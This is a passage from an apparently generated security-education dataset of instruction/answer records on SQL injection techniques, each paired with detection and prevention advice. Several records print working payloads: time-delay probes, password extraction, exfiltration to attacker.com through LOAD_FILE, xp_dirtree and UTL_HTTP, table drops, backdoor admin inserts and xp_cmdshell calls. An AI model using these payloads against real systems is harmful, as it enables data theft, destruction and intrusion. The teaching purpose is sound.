Network latency affects accuracy, but it defeats all response-based defenses.\n\nCommon attack vectors include:\n- MySQL: IF(condition,SLEEP(5),0)\n- MSSQL: WAITFOR DELAY '0:0:5'\n- PostgreSQL: pg_sleep(5)\n- BENCHMARK: BENCHMARK(10000000,SHA1('test'))", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098321Z", "updated_at": "2025-12-17T19:35:42.098321Z"} +{"id": "trtp-d030ac35061a", "instruction": "What attacks exploit Time-Based Blind SQL Injection?", "output": "Attack techniques involving Time-Based Blind SQL Injection:\n\n- MySQL: IF(condition,SLEEP(5),0)\n- MSSQL: WAITFOR DELAY '0:0:5'\n- PostgreSQL: pg_sleep(5)\n- BENCHMARK: BENCHMARK(10000000,SHA1('test'))\n\nDefenders can detect these attacks by:\n- SLEEP/WAITFOR/pg_sleep in parameters\n- Abnormally long response times\n- BENCHMARK function calls", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098336Z", "updated_at": "2025-12-17T19:35:42.098336Z"} +{"id": "trtp-347c51544e83", "instruction": "What log entries indicate Time-Based Blind SQL Injection attacks?", "output": "Methods for detecting Time-Based Blind SQL Injection attacks or anomalies:\n\n- SLEEP/WAITFOR/pg_sleep in parameters\n- 
Abnormally long response times\n- BENCHMARK function calls\n- Response time correlation with specific inputs", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098348Z", "updated_at": "2025-12-17T19:35:42.098348Z"} +{"id": "trtp-53f49e0a0bc9", "instruction": "How can organizations protect against Time-Based Blind SQL Injection?", "output": "Security controls and preventive measures for Time-Based Blind SQL Injection:\n\n- Parameterized queries\n- Query timeout limits\n- Disable delay functions for app accounts\n- Request timeout at application level\n\nTime-based injection is the most reliable blind technique, working even when response content is identical. 
Network latency affects accuracy, but it defeats all response-based defenses.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098361Z", "updated_at": "2025-12-17T19:35:42.098361Z"} +{"id": "trtp-3d028687d9ea", "instruction": "What does Time-Based Blind SQL Injection look like in SQL?", "output": "Example of Time-Based Blind SQL Injection:\n\n```sql\n-- MySQL: ' AND IF(1=1,SLEEP(5),0)--\n-- MSSQL: '; WAITFOR DELAY '0:0:5'--\n-- PostgreSQL: '; SELECT pg_sleep(5)--\n-- Conditional: ' AND IF(SUBSTRING(password,1,1)='a',SLEEP(5),0)--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098372Z", "updated_at": "2025-12-17T19:35:42.098372Z"} +{"id": "trtp-6ebc8a133f0d", "instruction": "Explain Second-Order SQL Injection from a security perspective.", "output": "Second-order injection stores malicious input that executes later when retrieved and used in subsequent queries. The payload doesn't execute on input but triggers when stored data is used unsafely in queries.\n\nSecurity Relevance: Second-order injection bypasses input validation because the payload appears harmless at entry. Applications trusting database-stored data are vulnerable. 
The execution point differs from injection point, complicating detection.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100463Z", "updated_at": "2025-12-17T19:35:42.100463Z"} +{"id": "trtp-5818da4ea678", "instruction": "Describe the technical aspects of Second-Order SQL Injection.", "output": "Second-Order SQL Injection consists of the following key components:\n\n- Data storage without sanitization\n- Later retrieval and query use\n- Trusted internal data assumption\n- Profile/preference fields as storage\n- Batch processing vulnerabilities", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100492Z", "updated_at": "2025-12-17T19:35:42.100492Z"} +{"id": "trtp-25cf58e185fa", "instruction": "From a security perspective, why should defenders understand Second-Order SQL Injection?", "output": "Second-order injection bypasses input validation because the payload appears harmless at entry. Applications trusting database-stored data are vulnerable. 
The execution point differs from injection point, complicating detection.\n\nCommon attack vectors include:\n- Username injection triggering in password reset\n- Profile field injection in admin reports\n- Comment injection executing in moderation queue\n- Import data injection", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100507Z", "updated_at": "2025-12-17T19:35:42.100507Z"} +{"id": "trtp-bf3069b86dfb", "instruction": "What attacks exploit Second-Order SQL Injection?", "output": "Attack techniques involving Second-Order SQL Injection:\n\n- Username injection triggering in password reset\n- Profile field injection in admin reports\n- Comment injection executing in moderation queue\n- Import data injection\n\nDefenders can detect these attacks by:\n- SQL patterns in stored user data\n- Query tracing from storage to execution\n- Audit trail correlation", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100521Z", "updated_at": "2025-12-17T19:35:42.100521Z"} +{"id": "trtp-a8682408a78a", "instruction": "How do you detect exploitation of Second-Order SQL Injection?", "output": "Methods for detecting Second-Order SQL Injection attacks or anomalies:\n\n- SQL 
patterns in stored user data\n- Query tracing from storage to execution\n- Audit trail correlation\n- Stored procedure parameter analysis", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100532Z", "updated_at": "2025-12-17T19:35:42.100532Z"} +{"id": "trtp-3c3332f6c6d1", "instruction": "How do you defend against Second-Order SQL Injection attacks?", "output": "Security controls and preventive measures for Second-Order SQL Injection:\n\n- Parameterize ALL queries including internal data\n- Never trust data just because it's from database\n- Validate at both input and retrieval\n- Defense in depth for all data sources\n\nSecond-order injection bypasses input validation because the payload appears harmless at entry. Applications trusting database-stored data are vulnerable. 
The execution point differs from injection point, complicating detection.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100551Z", "updated_at": "2025-12-17T19:35:42.100551Z"} +{"id": "trtp-db815d016073", "instruction": "What is the syntax for Second-Order SQL Injection?", "output": "Example of Second-Order SQL Injection:\n\n```sql\n-- Step 1: Register username as: admin'--\n-- Step 2: Application stores it\n-- Step 3: Password reset query uses stored username unsafely\n-- Result: Query becomes: UPDATE users SET password='...' WHERE username='admin'--'\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100562Z", "updated_at": "2025-12-17T19:35:42.100562Z"} +{"id": "trtp-71b7059bde55", "instruction": "Explain Out-of-Band SQL Injection from a security perspective.", "output": "Out-of-band injection exfiltrates data through alternative channels like DNS or HTTP requests initiated by the database server. When direct and blind techniques fail, OOB uses database features to make external connections.\n\nSecurity Relevance: OOB injection works when other techniques are blocked. It requires the database server to have external network access. 
A single query can exfiltrate significant data through DNS subdomains.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102362Z", "updated_at": "2025-12-17T19:35:42.102362Z"} +{"id": "trtp-034d45131e10", "instruction": "What are the main parts of Out-of-Band SQL Injection that security teams should understand?", "output": "Out-of-Band SQL Injection consists of the following key components:\n\n- DNS exfiltration via LOAD_FILE\n- HTTP requests (UTL_HTTP, xp_dirtree)\n- SMB/UNC path requests\n- Database email functionality\n- File write to web directories", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102382Z", "updated_at": "2025-12-17T19:35:42.102382Z"} +{"id": "trtp-e5b1d18855cd", "instruction": "From a security perspective, why should defenders understand Out-of-Band SQL Injection?", "output": "OOB injection works when other techniques are blocked. It requires the database server to have external network access. 
A single query can exfiltrate significant data through DNS subdomains.\n\nCommon attack vectors include:\n- DNS exfiltration: data encoded in subdomain\n- HTTP callback with data in URL\n- SMB authentication capture\n- File write for webshell", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102406Z", "updated_at": "2025-12-17T19:35:42.102406Z"} +{"id": "trtp-e00ba1f852d4", "instruction": "What are common attack techniques involving Out-of-Band SQL Injection?", "output": "Attack techniques involving Out-of-Band SQL Injection:\n\n- DNS exfiltration: data encoded in subdomain\n- HTTP callback with data in URL\n- SMB authentication capture\n- File write for webshell\n\nDefenders can detect these attacks by:\n- Outbound DNS from database server\n- HTTP connections initiated by database\n- SMB traffic from database tier", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102421Z", "updated_at": "2025-12-17T19:35:42.102421Z"} +{"id": "trtp-cb0ab5bae2c8", "instruction": "What log entries indicate Out-of-Band SQL Injection attacks?", "output": "Methods for detecting Out-of-Band SQL Injection attacks or anomalies:\n\n- Outbound DNS from database server\n- HTTP 
connections initiated by database\n- SMB traffic from database tier\n- Unusual file operations", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102433Z", "updated_at": "2025-12-17T19:35:42.102433Z"} +{"id": "trtp-a163d691f46c", "instruction": "How can organizations protect against Out-of-Band SQL Injection?", "output": "Security controls and preventive measures for Out-of-Band SQL Injection:\n\n- Block database server outbound connections\n- Disable UTL_HTTP, xp_cmdshell, xp_dirtree\n- Network segmentation\n- Monitor database egress traffic\n\nOOB injection works when other techniques are blocked. It requires the database server to have external network access. 
A single query can exfiltrate significant data through DNS subdomains.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102445Z", "updated_at": "2025-12-17T19:35:42.102445Z"} +{"id": "trtp-94ab81f68cf3", "instruction": "What does Out-of-Band SQL Injection look like in SQL?", "output": "Example of Out-of-Band SQL Injection:\n\n```sql\n-- MySQL: LOAD_FILE(CONCAT('\\\\\\\\',password,'.attacker.com\\\\a'))\n-- MSSQL: exec master..xp_dirtree '\\\\\\\\data.attacker.com\\\\a'\n-- Oracle: SELECT UTL_HTTP.REQUEST('http://attacker.com/'||password) FROM users\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102455Z", "updated_at": "2025-12-17T19:35:42.102455Z"} +{"id": "trtp-0d83492de2e7", "instruction": "What do security professionals need to know about Stacked Queries Injection?", "output": "Stacked queries execute multiple SQL statements separated by semicolons. This enables attackers to execute arbitrary statements including DDL commands, beyond just modifying the original query.\n\nSecurity Relevance: Stacked queries enable complete database control: creating backdoor accounts, dropping tables, modifying permissions, or executing system commands. 
Not all databases/drivers support this, but when available, it's devastating.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104234Z", "updated_at": "2025-12-17T19:35:42.104234Z"} +{"id": "trtp-58124f627b7d", "instruction": "Describe the technical aspects of Stacked Queries Injection.", "output": "Stacked Queries Injection consists of the following key components:\n\n- Statement termination (;)\n- Multiple statement execution\n- Database/driver support requirements\n- DDL command injection\n- Transaction manipulation", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104255Z", "updated_at": "2025-12-17T19:35:42.104255Z"} +{"id": "trtp-5b68132184ac", "instruction": "How can Stacked Queries Injection lead to database security incidents?", "output": "Stacked queries enable complete database control: creating backdoor accounts, dropping tables, modifying permissions, or executing system commands. 
Not all databases/drivers support this, but when available, it's devastating.\n\nCommon attack vectors include:\n- Account creation: ; INSERT INTO users VALUES('hacker','password','admin')\n- Table destruction: ; DROP TABLE sensitive_data\n- Privilege escalation: ; GRANT ALL PRIVILEGES TO attacker\n- System command: ; EXEC xp_cmdshell 'command'", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104269Z", "updated_at": "2025-12-17T19:35:42.104269Z"} +{"id": "trtp-1228415d735c", "instruction": "What threats are associated with Stacked Queries Injection?", "output": "Attack techniques involving Stacked Queries Injection:\n\n- Account creation: ; INSERT INTO users VALUES('hacker','password','admin')\n- Table destruction: ; DROP TABLE sensitive_data\n- Privilege escalation: ; GRANT ALL PRIVILEGES TO attacker\n- System command: ; EXEC xp_cmdshell 'command'\n\nDefenders can detect these attacks by:\n- Semicolons in user input\n- Multiple statement execution in logs\n- DDL statements from application accounts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104284Z", "updated_at": "2025-12-17T19:35:42.104284Z"} +{"id": "trtp-ae0fbbf57a5f", "instruction": "How can 
security teams detect attacks related to Stacked Queries Injection?", "output": "Methods for detecting Stacked Queries Injection attacks or anomalies:\n\n- Semicolons in user input\n- Multiple statement execution in logs\n- DDL statements from application accounts\n- Unusual GRANT/REVOKE operations", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104296Z", "updated_at": "2025-12-17T19:35:42.104296Z"} +{"id": "trtp-e86bc5185d80", "instruction": "How do you defend against Stacked Queries Injection attacks?", "output": "Security controls and preventive measures for Stacked Queries Injection:\n\n- Parameterized queries\n- Disable multiple statement execution\n- Restrict DDL permissions\n- Application accounts with minimal privileges\n\nStacked queries enable complete database control: creating backdoor accounts, dropping tables, modifying permissions, or executing system commands. 
Not all databases/drivers support this, but when available, it's devastating.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104318Z", "updated_at": "2025-12-17T19:35:42.104318Z"} +{"id": "trtp-ad91ca7a5cf3", "instruction": "What does Stacked Queries Injection look like in SQL?", "output": "Example of Stacked Queries Injection:\n\n```sql\n-- MSSQL (supports stacked): '; EXEC xp_cmdshell 'whoami'--\n-- MySQL (connection-dependent): '; DROP TABLE users;--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104328Z", "updated_at": "2025-12-17T19:35:42.104328Z"} +{"id": "trtp-4d86f3adbd56", "instruction": "How does SQL Injection in INSERT/UPDATE Contexts work and what are its security implications?", "output": "SQL injection in INSERT and UPDATE statements has different exploitation patterns than SELECT injection. These contexts modify data, enabling privilege escalation, data corruption, and persistence mechanisms.\n\nSecurity Relevance: INSERT/UPDATE injection directly modifies database state. 
Attackers can escalate privileges by injecting admin role values, create backdoor accounts, or corrupt critical data.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106422Z", "updated_at": "2025-12-17T19:35:42.106422Z"} +{"id": "trtp-e5080318a162", "instruction": "Describe the technical aspects of SQL Injection in INSERT/UPDATE Contexts.", "output": "SQL Injection in INSERT/UPDATE Contexts consists of the following key components:\n\n- VALUES clause injection\n- SET clause injection\n- Additional column injection\n- Subquery injection in values\n- ON DUPLICATE KEY exploitation", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106442Z", "updated_at": "2025-12-17T19:35:42.106442Z"} +{"id": "trtp-ed29aff2cd80", "instruction": "What security risks are associated with SQL Injection in INSERT/UPDATE Contexts?", "output": "INSERT/UPDATE injection directly modifies database state. 
Attackers can escalate privileges by injecting admin role values, create backdoor accounts, or corrupt critical data.\n\nCommon attack vectors include:\n- Additional row injection in INSERT\n- Extra column modification in UPDATE\n- Subquery data extraction in VALUES\n- Role/privilege field manipulation", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106457Z", "updated_at": "2025-12-17T19:35:42.106457Z"} +{"id": "trtp-99fd47611480", "instruction": "How do attackers abuse SQL Injection in INSERT/UPDATE Contexts?", "output": "Attack techniques involving SQL Injection in INSERT/UPDATE Contexts:\n\n- Additional row injection in INSERT\n- Extra column modification in UPDATE\n- Subquery data extraction in VALUES\n- Role/privilege field manipulation\n\nDefenders can detect these attacks by:\n- Unexpected row counts in INSERT/UPDATE\n- Privilege field modifications\n- Subqueries in VALUE clauses", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106470Z", "updated_at": "2025-12-17T19:35:42.106470Z"} +{"id": "trtp-381d965d706a", "instruction": "What indicators reveal malicious activity involving SQL Injection in INSERT/UPDATE Contexts?", 
"output": "Methods for detecting SQL Injection in INSERT/UPDATE Contexts attacks or anomalies:\n\n- Unexpected row counts in INSERT/UPDATE\n- Privilege field modifications\n- Subqueries in VALUE clauses\n- Multi-row INSERT patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106506Z", "updated_at": "2025-12-17T19:35:42.106506Z"} +{"id": "trtp-2f24a61d78e7", "instruction": "What security controls mitigate SQL Injection in INSERT/UPDATE Contexts risks?", "output": "Security controls and preventive measures for SQL Injection in INSERT/UPDATE Contexts:\n\n- Parameterized queries for INSERT/UPDATE\n- Explicit column lists in INSERT\n- Row-level security\n- Trigger-based validation\n\nINSERT/UPDATE injection directly modifies database state. 
Attackers can escalate privileges by injecting admin role values, create backdoor accounts, or corrupt critical data.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106525Z", "updated_at": "2025-12-17T19:35:42.106525Z"} +{"id": "trtp-b3d448925c99", "instruction": "Show an example of SQL Injection in INSERT/UPDATE Contexts.", "output": "Example of SQL Injection in INSERT/UPDATE Contexts:\n\n```sql\n-- INSERT injection: INSERT INTO users VALUES('user','pass',''),('admin','hacked','admin')\n-- UPDATE injection: UPDATE users SET email='a@b.c',role='admin' WHERE id=1\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106537Z", "updated_at": "2025-12-17T19:35:42.106537Z"} +{"id": "trtp-63af65603f57", "instruction": "Describe SQL Injection in ORDER BY/GROUP BY and its role in database security.", "output": "ORDER BY and GROUP BY clauses don't accept parameterized values in most databases, making them common injection vectors. Attackers use these contexts for error-based or blind extraction when other vectors are patched.\n\nSecurity Relevance: ORDER BY injection is often overlooked because developers assume sorting is safe. 
Since parameterization doesn't work here, allowlisting column names is required. Conditional CASE statements enable blind extraction.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108901Z", "updated_at": "2025-12-17T19:35:42.108901Z"} +{"id": "trtp-49820078cb05", "instruction": "What elements make up SQL Injection in ORDER BY/GROUP BY?", "output": "SQL Injection in ORDER BY/GROUP BY consists of the following key components:\n\n- Column specification in ORDER BY\n- Expression-based ordering\n- CASE statements for conditional ordering\n- Error-based extraction through ORDER BY\n- GROUP BY injection patterns", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108921Z", "updated_at": "2025-12-17T19:35:42.108921Z"} +{"id": "trtp-7aece8617a6a", "instruction": "What security risks are associated with SQL Injection in ORDER BY/GROUP BY?", "output": "ORDER BY injection is often overlooked because developers assume sorting is safe. Since parameterization doesn't work here, allowlisting column names is required. 
Conditional CASE statements enable blind extraction.\n\nCommon attack vectors include:\n- Column count enumeration via ORDER BY\n- CASE-based conditional extraction\n- Error-based extraction through invalid column\n- Schema discovery via column names", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108936Z", "updated_at": "2025-12-17T19:35:42.108936Z"} +{"id": "trtp-3023ac22f25e", "instruction": "What threats are associated with SQL Injection in ORDER BY/GROUP BY?", "output": "Attack techniques involving SQL Injection in ORDER BY/GROUP BY:\n\n- Column count enumeration via ORDER BY\n- CASE-based conditional extraction\n- Error-based extraction through invalid column\n- Schema discovery via column names\n\nDefenders can detect these attacks by:\n- Non-column values in ORDER BY\n- CASE/IF statements in sorting\n- Numeric ORDER BY probing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108950Z", "updated_at": "2025-12-17T19:35:42.108950Z"} +{"id": "trtp-dd8a318d674e", "instruction": "What indicators reveal malicious activity involving SQL Injection in ORDER 